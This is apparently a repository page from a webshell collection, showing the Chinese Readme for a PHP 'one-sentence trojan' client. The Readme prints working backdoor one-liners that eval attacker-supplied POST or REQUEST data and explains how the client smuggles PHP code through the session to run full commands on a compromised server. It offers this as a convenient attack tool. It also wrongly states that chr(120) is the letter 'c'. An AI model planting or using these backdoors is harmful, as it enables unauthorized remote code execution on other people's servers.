webshell/net-friend/php/零魂PHP一句话木马客户端%28一键提交版%29/零魂PHP一句话木马客户端(一键提交版)
2013-06-20 09:50:18 +08:00
..
Readme.txt update net-friend 2013-06-20 09:50:18 +08:00
零魂PHP一句话木马客户端.htm update net-friend 2013-06-20 09:50:18 +08:00

This file contains ambiguous Unicode characters

This file contains Unicode characters that might be confused with other characters. If you think that this is intentional, you can safely ignore this warning. Use the Escape button to reveal them.

零魂PHP一句话木马客户端(一键提交版)

Author:zerosoul(零魂)



一句话:
<?php eval($_POST['c'])?> 
<?php eval($_REQUEST['c'])?>

海洋顶端有个一键提交版的ASP一句话客户端很方便一次提交之后一句话就可以当大马用了。

但是PHP一句话一直没有见这样的客户端网上居然还有转的到处都是的工具结果下载下来不能用。

比较喜欢一句话的一键提交这种形式所以花了2x半个通宵的时间做了这个东西思路参考的是海洋客户端的CSS也是修改它的呵呵。

由于一键提交版的特殊性暂时是不能随心所欲的换密码的这个客户端的密码是字母c。


大概原理:

一键提交版的一句话客户端连接成功之后每次POST数据的时候, 假设一句话密码是c都要先让本地表单:

c = session_start();eval($_SESSION[chr(120)]);  

chr(120)就是字母c为了避免单引号写成chr(120)形式。

然后一句话在eval($_POST[c])的时候才能执行保存在Session中的我们的PHP代码。

想用其它密码的朋友可以依据这个原理修改。






Blog
http://hi.baidu.com/0soul